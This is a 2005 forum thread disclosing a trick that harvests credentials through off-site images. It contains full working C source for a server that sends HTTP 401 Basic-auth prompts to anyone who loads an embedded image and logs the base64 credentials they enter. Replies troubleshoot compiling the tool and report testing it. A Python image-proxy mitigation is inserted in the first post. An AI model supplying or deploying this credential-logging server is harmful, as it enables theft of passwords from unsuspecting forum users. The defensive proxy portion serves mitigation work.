JustAsFire
Aug 10 2005, 02:10 PM
QUOTE
Discovered by: JustAsFire JustAsFire@gmail.com
Vulnerable: Any web page in which you can insert images hosted on other servers.
Description: If a web page contains an image from a site which requires authentication, a Username/Password prompt displaying the host name and authentication realm will appear asking for username and password. A malicious http server could be used to log the credentials of the users who would authenticate.

*********************************** POC ******************************************
CODE
/********************************************************************************
 ***name        : AuthServer.c
 ***author      : JustAsFire JustAsFire[at]gmail.com
 ***description : a very simple web server which sends a 401 Authorization request to anyone
 ***              connecting to it. If the client authenticates it stores the username and password
 ***              in the file userlog (encrypted in base64).
 ********************************************************************************/
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>

#define MAXPENDING 5
#define BUFFSIZE 10000

void Die(char *mess)
{
    perror(mess);
    exit(1);
}

/* Look for a Basic credential in the request; if present, log the base64 token. */
int GetCredientials(char *buffer)
{
    char s[200], *p;
    int i;
    FILE *f;

    p = strstr(buffer, "Authorization: Basic ");
    if (p) {
        if (strlen(p) > 50) {
            printf("Buffer overflow atempt");
            return 0;
        }
        for (i = 0; i + 25 < strlen(p); i++)
            s[i] = p[21 + i];
        s[i] = '\0';                 /* terminate the copied token before printing it */

        printf("\n%s\n", s);
        f = fopen("userlog", "a");
        if (f == NULL)
            Die("Failed to open userlog");
        fprintf(f, "%s\n", s);
        fclose(f);
        return 1;
    } else
        return 0;
}

void HandleClient(int sock)
{
    char buffer[BUFFSIZE];
    ssize_t n;

    n = read(sock, buffer, BUFFSIZE - 1);
    if (n < 0)
        Die("Failed to receive bytes from client");
    buffer[n] = '\0';                /* strstr() needs a terminated string */

    if (GetCredientials(buffer) == 0) {
        /* one single string literal: keep it on one line when copying the source */
        char *s = "HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n";
        write(sock, s, strlen(s));
    }
    close(sock);
}

int main(int argc, char *argv[])
{
    int serversock, clientsock;
    struct sockaddr_in server, client;

    if (argc != 2) {
        fprintf(stderr, "USAGE: AuthServer <port>\n");
        exit(1);
    }
    if ((serversock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        Die("Failed to create socket");
    }
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = htons(atoi(argv[1]));
    if (bind(serversock, (struct sockaddr *) &server, sizeof(server)) < 0) {
        Die("Failed to bind the server socket");
    }
    if (listen(serversock, MAXPENDING) < 0) {
        Die("Failed to listen on server socket");
    }
    fprintf(stdout, "Created by: JustAsFire -- JustAsFire[at]gmail.com\n");
    fprintf(stdout, "Listening for connections...\n");
    while (1) {
        socklen_t clientlen = sizeof(client);
        if ((clientsock = accept(serversock, (struct sockaddr *) &client, &clientlen)) < 0) {
            Die("Failed to accept client connection");
        }
        fprintf(stdout, "Client connected: %s\n", inet_ntoa(client.sin_addr));
        HandleClient(clientsock);
    }
}
P.S. I've discovered this vulnerability on this forum
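The weakness described above sits on the forum's side: the browser fetches the off-site image directly, so a third-party host can answer with a 401 and the browser shows its own credential prompt. The standard mitigation is to never let the client talk to the remote host at all: rewrite every off-site `<img src>` in user content to go through a server-side image proxy, and have that proxy refuse to relay any upstream response that carries an authentication challenge. The following is an added example in Python, not code from the post or from the Full-Disclosure advisory; the proxy path `/imgproxy?url=`, the placeholder `/static/blocked.png`, the function names and the two sample responses are constructed for illustration.

```python
"""Forum-side mitigation for the "image that asks for a password" problem.

Added example, not the poster's code.  Two pieces:
  1. rewrite_post_images(): rewrite off-site <img src> in user HTML so the
     browser loads them through the forum's own proxy endpoint (hypothetical
     path PROXY_PREFIX), and drop URLs that are not plain http(s) or that
     carry user:pass@ credentials.
  2. proxy_decision(): the policy the proxy applies to the upstream reply
     before relaying it.  Anything with a 401/407 status or a
     WWW-Authenticate / Proxy-Authenticate header is refused, as is anything
     that is not an image, so no authentication challenge reaches the browser.
"""
import re
from urllib.parse import quote, urlsplit

PROXY_PREFIX = "/imgproxy?url="        # hypothetical proxy endpoint
BLOCKED_IMAGE = "/static/blocked.png"  # hypothetical placeholder image

IMG_SRC_RE = re.compile(r'(<img\b[^>]*\bsrc=")([^"]*)(")', re.IGNORECASE)


def is_safe_remote_url(url):
    """Only plain http(s) URLs with a host and without embedded credentials."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    # user:pass@host would let a post pre-seed Basic auth against the remote host
    if parts.username is not None or parts.password is not None:
        return False
    return True


def rewrite_post_images(html, own_host):
    """Route every off-site image through the proxy; leave local images alone."""
    def repl(match):
        prefix, src, suffix = match.groups()
        parts = urlsplit(src)
        if not parts.netloc or parts.hostname == own_host:
            return match.group(0)                 # relative or same-host: untouched
        if not is_safe_remote_url(src):
            return prefix + BLOCKED_IMAGE + suffix
        return prefix + PROXY_PREFIX + quote(src, safe="") + suffix
    return IMG_SRC_RE.sub(repl, html)


def parse_response_head(raw):
    """Return (status, headers) from the head of a raw HTTP response.

    Accepts both CRLF and bare LF line endings (the PoC server in the post
    sends LF).  Header names are lower-cased so lookups are case-insensitive.
    """
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head = raw.split(sep, 1)[0].decode("iso-8859-1")
    lines = head.splitlines()
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def proxy_decision(status, headers):
    """Decide whether the proxy may relay an upstream response. Returns (ok, reason)."""
    if status in (401, 407) or "www-authenticate" in headers or "proxy-authenticate" in headers:
        return False, "upstream demanded credentials"
    if status != 200:
        return False, "upstream status %d" % status
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if not ctype.startswith("image/"):
        return False, "not an image: " + (ctype or "unknown")
    return True, "ok"


# Constructed sample responses: the first mimics the 401 challenge the PoC
# server sends, the second is an ordinary image reply.
SAMPLE_401 = (
    b"HTTP/1.1 401 Unauthorized\n"
    b"Server: AuthServer/0.01 (Unix)\n"
    b'WWW-Authenticate: Basic realm="forum images"\n'
    b"Content-Type: text/html; charset=iso-8859-1\n\n"
)
SAMPLE_200 = b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    post = '<p>look</p><img src="http://images.example/x.png"><img src="/uploads/y.png">'
    print(rewrite_post_images(post, "forum.example"))
    for raw in (SAMPLE_401, SAMPLE_200):
        print(proxy_decision(*parse_response_head(raw)))
```

The rewrite step is what removes the exposure: once the browser only ever sees the forum's own origin for images, a remote 401 can at most make the proxy return a broken image. The decision step is deliberately strict (200 and an `image/*` content type, or nothing); a proxy that relayed 3xx redirects or non-image bodies would reopen the same hole one hop further away.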
cvh
Aug 10 2005, 03:48 PM
Very interesting find, this css really scares me, you almost can't protect yourself against it. It just pops up when you open a topic on a forum or, like JustAsFire says, on any web page in which you can insert images hosted on other servers. So don't retype your password at a site which requests you to retype your password when the server addresses don't match between the site you are visiting and the requesting site. You can view the address in the requesting form. ps: I tested it against the gso warserver and here is a java base64 decoder for decoding the logged usernames and passwords: http://mit.edu/harold/www/code.html Thanks for the contribution and I hope to see many more hacks from you JustAsFire.
JustAsFire
Aug 10 2005, 03:52 PM
Thanks. But look more carefully at your screenshot; it says: "it's a scam don't do it". You should have edited the source code first.
cvh
Aug 10 2005, 04:09 PM
QUOTE(JustAsFire @ Aug 10 2005, 04:52 PM) Thanks. But look more carefully at your screenshot; it says: "it's a scam don't do it". You should have edited the source code first.
Yes I know, I tested it on the wargame server, not the main server; I didn't want to log anyone's password here. I wasn't going to give the kiddies here ideas, it's a very dangerous xss. I'm thinking of rewriting this in perl/python or java to make it platform independent.
whisker
Aug 10 2005, 06:51 PM
QUOTE(JustAsFire @ Aug 10 2005, 02:10 PM) [...]
whisker
Aug 10 2005, 06:55 PM
QUOTE(whisker @ Aug 10 2005, 06:51 PM) QUOTE(JustAsFire @ Aug 10 2005, 02:10 PM) [...]
I've got a lot of errors compiling this on linux, I think the code's characters changed when I copy-pasted from the quote.. could you upload it to any website so I can wget it.. and test it... thanks
Ecko
Aug 10 2005, 07:09 PM
I don't understand this exploit... this exploit logs until someone logs into an htaccess system, or what?
JustAsFire
Aug 10 2005, 07:14 PM
QUOTE(Ecko @ Aug 10 2005, 07:09 PM) I don't understand this exploit... this exploit logs until someone logs into an htaccess system, or what?
Description: If a web page contains an image from a site which requires authentication, a Username/Password prompt displaying the host name and authentication realm will appear asking for username and password. A malicious http server could be used to log the credentials of the users who would authenticate.
@whisker you can also find it on the Full-Disclosure mailing list http://seclists.org/lists/fulldisclosure/2005/Aug/0283.html. Also you could edit your posts and delete those big quotes.
whisker
Aug 10 2005, 07:27 PM
QUOTE(JustAsFire @ Aug 10 2005, 07:14 PM) QUOTE(Ecko @ Aug 10 2005, 07:09 PM) I don't understand this exploit... this exploit logs until someone logs into an htaccess system, or what?
Description: If a web page contains an image from a site which requires authentication, a Username/Password prompt displaying the host name and authentication realm will appear asking for username and password. A malicious http server could be used to log the credentials of the users who would authenticate.
@whisker you can also find it on the Full-Disclosure mailing list http://seclists.org/lists/fulldisclosure/2005/Aug/0283.html
Still an error.. I think it needs a bit of fixing:
CODE
cc AuthServer.c -o AuthServer
AuthServer.c:56:25: missing terminating " character
AuthServer.c: In function `HandleClient':
AuthServer.c:57: error: parse error before "AuthServer"
AuthServer.c:58: error: stray '\' in program
AuthServer.c:58: error: stray '\' in program
AuthServer.c:58:40: missing terminating " character
AuthServer.c:59: error: stray '\' in program
AuthServer.c:59:10: missing terminating " character
AuthServer.c:60: error: stray '\' in program
AuthServer.c:60: error: stray '\' in program
AuthServer.c:61: error: `charset' undeclared (first use in this function)
AuthServer.c:61: error: (Each undeclared identifier is reported only once
AuthServer.c:61: error: for each function it appears in.)
AuthServer.c:61: error: `iso' undeclared (first use in this function)
AuthServer.c:61: error: stray '\' in program
AuthServer.c:61: error: parse error before "n"
AuthServer.c:61: error: stray '\' in program
AuthServer.c:61:23: missing terminating " character
AuthServer.c:95:24: missing terminating " character
AuthServer.c: In function `main':
AuthServer.c:96: error: parse error before "JustAsFire"
AuthServer.c:96: error: stray '\' in program
AuthServer.c:96:26: missing terminating " character
make: *** [AuthServer] Error 1
Cheers for the link
JustAsFire
Aug 10 2005, 07:43 PM
CODE
char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n";
Your problem is here: even though it seems to span multiple lines, this part of the code is actually one line. When you paste it, it probably gets split into multiple lines.
whisker
Aug 10 2005, 08:09 PM
QUOTE(JustAsFire @ Aug 10 2005, 07:43 PM)
CODE
char *s="HTTP/1.1 401 Authorization Require\nServer: AuthServer/0.01 (Unix)\nWWW-Authenticate: Basic realm=\" ...It's a scam don't do it... \"\nKeep-Alive: timeout=15, max=100\nConnection: Keep-Alive\nTransfer-Encoding: chunked\nContent-Type: text/html; charset=iso-8859-1\n\n";
Your problem is here: even though it seems to span multiple lines, this part of the code is actually one line. When you paste it, it probably gets split into multiple lines.
Thanks for clarifying.. it works now... (I should look more carefully... just got up from bed) cheers
Xardas
Aug 10 2005, 08:33 PM
your good 10x! QUOTE(JustAsFire @ Aug 10 2005, 02:10 PM) [...]
Xardas
Aug 10 2005, 08:36 PM
10x man u rull!!!!
JustAsFire
Aug 10 2005, 08:40 PM
@xardas: you should say thanks for warn/ban. Bearded nose is hunting for you. Could a moderator be so kind and delete all the offtopics and immense quotes? thanks